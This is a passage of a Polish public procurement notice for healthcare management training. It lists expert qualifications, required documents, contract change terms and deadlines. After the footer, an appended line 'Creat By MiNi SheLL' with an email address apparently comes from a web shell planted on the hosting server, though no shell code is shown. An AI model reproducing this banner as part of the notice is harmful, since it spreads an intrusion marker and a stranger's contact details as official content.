<br/>Wykonawca w ramach zespołu ekspertów zapewni zaangażowanie co najmniej 5ekspertów:<br/>A.Ekspert ds.prawnych,wyższe prawnicze<br/>*w okresie ostatnich 7lat prowadził min.80h. szkoleń/wykładów,w tym co najmniej 40h w obszarze ochrony zdrowia lub działalności kontrolnej,<br/>B.Ekspert ds.audytu,wyższe,<br/>*w okresie ostatnich 7lat prowadził lub bezpośrednio nadzorował min.20 audytów w podmiotach leczniczych (na miejscu),<br/>C.Ekspert ds.finansów,wyższe,<br/>*w okresie ostatnich 15lat posiada co najmniej 10-letnie dośw.zawodowe w finansach, w tym w tworzeniu i realizacji programów naprawczych i programów restrukturyzacyjnych,<br/>*w okresie ostatnich 7lat prowadził min. 40h szkoleń/wykładów dot. gospodarki finansowej w podmiotach leczniczych.<br/>D.Ekspert ds.zarządzania,wyższe,<br/>*w okresie ostatnich 15lat posiada co najmniej 5-letnie dośw. zawodowe na stanowisku kierowniczym, w tym w zarządzaniu podmiotem leczniczym,<br/>E. Ekspert ds. umiejętności interpersonalnych,wyższe, <br/>*w okresie ostatnich 7lat prowadził min.80 szkoleń dot. umiejętności interpersonalnych (komunikacji zewnętrznej i wewnętrznej,radzenia sobie ze stresem, asertywności itd.),w tym min.40 h. dot. umiejętności interpersonalnych kadry zrządzającej.<br/>Część VI <br/>Wykonawca w ramach zespołu ekspertów zapewni zaangażowanie co najmniej 6 ekspertów:<br/>A.Ekspert ds.prawnych,wyższe prawnicze<br/>*w okresie ostatnich 7lat prowadził min. 80h szkoleń/wykładów w tym co najmniej 40h w obszarze ochrony zdrowia lub działalności kontrolnej,<br/>B. Ekspert ds.audytu,wyższe,<br/>*w okresie ostatnich 7lat prowadził lub bezpośrednio nadzorował min.20 audytów w podmiotach leczniczych (na miejscu),<br/>C.Ekspert ds.finansów (2 osoby)<br/>Ekspert ds.finansów–I,wyższe,<br/>*w okresie ostatnich 15lat posiada co najmniej 10-letnie dośw. zawodowe w finansach,w tym w tworzeniu i realizacji programów naprawczych i programów restrukturyzacyjnych,<br/>*w okresie ostatnich 7lat prowadził min. 40h szkoleń/wykładów dot. gospodarki finansowej w podmiotach leczniczych.<br/>Ekspert ds. finansów–II,wyższe,<br/>*w okresie ostatnich 15lat posiada co najmniej 10-letnie dośw. zawodowe w finansach,w tym w tworzeniu i realizacji programów naprawczych i programów restrukturyzacyjnych,<br/>D.Ekspert ds.zarządzania,wyższe,<br/>*w okresie ostatnich 15lat posiada co najmniej 5-letnie dośw. zawodowe na stanowisku kierowniczym,w tym w zarządzaniu podmiotem leczniczym,<br/>E.Ekspert ds.umiejętności interpersonalnych,wyższe, <br/>*w okresie ostatnich 7lat prowadził min.80h szkoleń dot. umiejętności interpersonalnych (komunikacji zewnętrznej i wewnętrznej,radzenia sobie ze stresem,asertywności itd.),w tym min.40h dot. umiejętności interpersonalnych kadry zarządzającej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) oświadczenia o spełnieniu warunków udziału w postępowaniu oraz o<br/>braku podstaw wykluczenia z<br/>postępowania (załącznik nr 2 do SWZ)- składa się pod rygorem nieważności w formie elektronicznej<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających,<br/>czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego<br/>dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli<br/>z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych<br/>dokumentów - oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert – załącznik nr 6 do SWZ;<br/>2) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – załącznik nr 5 do<br/>SWZ;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 Ustawy PZP, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną<br/>ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej<br/>samej grupy kapitałowej- załącznik nr 3 do SWZ.<br/>2) odpisu lub informacji z Krajowego Rejestru Sądowego, w zakresie art. 109 ust. 1 pkt 4 Ustawy<br/>PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>3) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa<br/>w art. 125 ust. 1 Ustawy PZP, w zakresie podstaw wykluczenia z postępowania wskazanych<br/>przez zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 Ustawy PZP,<br/>b) art. 108 ust. 1 pkt 4 Ustawy PZP, dotyczących orzeczenia zakazu ubiegania się o zamówienie<br/>publiczne tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 Ustawy PZP, dotyczących zawarcia z innymi wykonawcami porozumienia<br/>mającego na celu zakłócenie konkurencji<br/>d) art. 108 ust. 1 pkt 6 Ustawy PZP <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1) dla przedmiotu umowy, o którym mowa w § 1 ust. 2 pkt 1, 3 i 5, w zakresie: a) zmiany<br/>programu szkolenia, wb) zaangażowania dodatkowych ekspertów, o ile jest to korzystne dla<br/>realizacji zamówienia i przebiegu edukacji, a wartość umowy dla odpowiednio części pierwszej,<br/>trzeciej i piątej nie wzrośnie o kwotę przekraczającą 20% wartości pierwotnej części pierwszej,<br/>trzeciej lub piątej, c) wydłużenia terminów wykonania umowy w odniesieniu do pierwszej, trzeciej<br/>i piątej części zamówienia, określonych odpowiednio w § 2 ust. 1 pkt 1, 3 i 5 w przypadku: -<br/>wystąpienia okoliczności, trudnych do przewidzenia w chwili zawarcia umowy, a które<br/>uniemożliwiają wykonanie umowy w terminach określonych odpowiednio w § 2 ust. 1 pkt 1, 3 lub<br/>5, i które są niezawinione przez Wykonawcę, w tym w szczególności okoliczności powstających<br/>na skutek zdarzeń losowych, siły wyższej lub zagrożenia epidemicznego, zaś ich skutki mają<br/>bezpośrednie przełożenie na terminową realizację części zamówienia, - wystąpienia opóźnień<br/>po stronie Zamawiającego, które uniemożliwiają Wykonawcy realizację przedmiotu umowy w<br/>terminie, określonym w § 2 ust. 1 pkt 1, 3 lub 5 - odpowiednio do zaistniałych okoliczności lub<br/>opóźnień po stronie Zamawiającego, ale nie więcej niż o połowę danego terminu 2) dla<br/>przedmiotu umowy, o którym mowa w § 1 ust. 2 pkt 2, 4 i 6, w zakresie:a) przedłużenia terminu<br/>realizacji drugiej, czwartej lub szóstej części zamówienia, o której odpowiednio mowa w § 2 ust.1 pkt 2, 4 i 6 w przypadku wystąpienia okoliczności, trudnych do przewidzenia w chwili zawarcia<br/>umowy, a które uniemożliwiają wykonanie umowy w tych terminach i które są niezawinione<br/>przez Wykonawcę, w tym w szczególności okoliczności powstających na skutek zdarzeń<br/>losowych, siły wyższej lub zagrożenia epidemicznego, zaś ich skutki mają bezpośrednie<br/>przełożenie na terminową realizację części zamówienia, ale nie dłużej niż o 8 miesięcy,b)<br/>zmiany sposobu wykonania, przeprowadzenia lub przebiegu szkoleń w przypadku wystąpienia<br/>okoliczności, trudnych do przewidzenia w chwili zawarcia umowy, a które uniemożliwiają lub<br/>utrudniają wykonanie umowy i które są niezawinione przez Wykonawcę, w tym w szczególności<br/>okoliczności powstających na skutek zdarzeń losowych, siły wyższej lub zagrożenia<br/>epidemicznego, zaś ich skutki mają bezpośrednie przełożenie na realizację części zamówienia,<br/>c) zaangażowania dodatkowych ekspertów, prowadzenie dodatkowych zajęć, wprowadzenie<br/>ekonsultacji, zmiany miejsca realizacji szkolenia (zmiana miasta), o ile jest to korzystne dla<br/>realizacji zamówienia i przebiegu edukacji, a wartość umowy odpowiednio dla części drugiej,<br/>czwartej i szóstej nie wzrośnie o kwotę przekraczającą 20% wartości części drugiej, czwartej i<br/>szóstej zamówienia, o której mowa odpowiednio w § 5 ust. 3, 5 lub 7,d) rezygnacji z realizacji<br/>maksymalnie do: - 7 edycji w odniesieniu do drugiej części zamówienia, - 5 edycji w odniesieniu<br/>do czwartej części zamówienia, - 1 edycji w odniesieniu do szóstej części zamówienia, - w<br/>przypadku braku chęci udziału w szkoleniach uczestników, przy czym za brak uczestników<br/>strony ustalają liczbę poniżej 8 chętnych do udziału w danym szkoleniu uczestników.<br/>Wynagrodzenie Wykonawcy zostanie wówczas odpowiednio pomniejszone o liczbę edycji, które<br/>nie zostaną zrealizowane; w przypadku zmiany w trakcie realizacji umowy: a) stawki podatku od<br/>towarów i usług, b) wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie<br/>art. 2 ust. 35 ustawy z dnia 10 października 2002 r..c)zasad podlegania ubezpieczeniom<br/>społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia<br/>społeczne lub zdrowotne, d) zasad gromadzenia i wysokości wpłat do pracowniczych planów<br/>kapitałowych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia-mz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-25 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-23</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Kwota na sfinansowanie zamówienia - 1.855.574,78 pln brutto</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com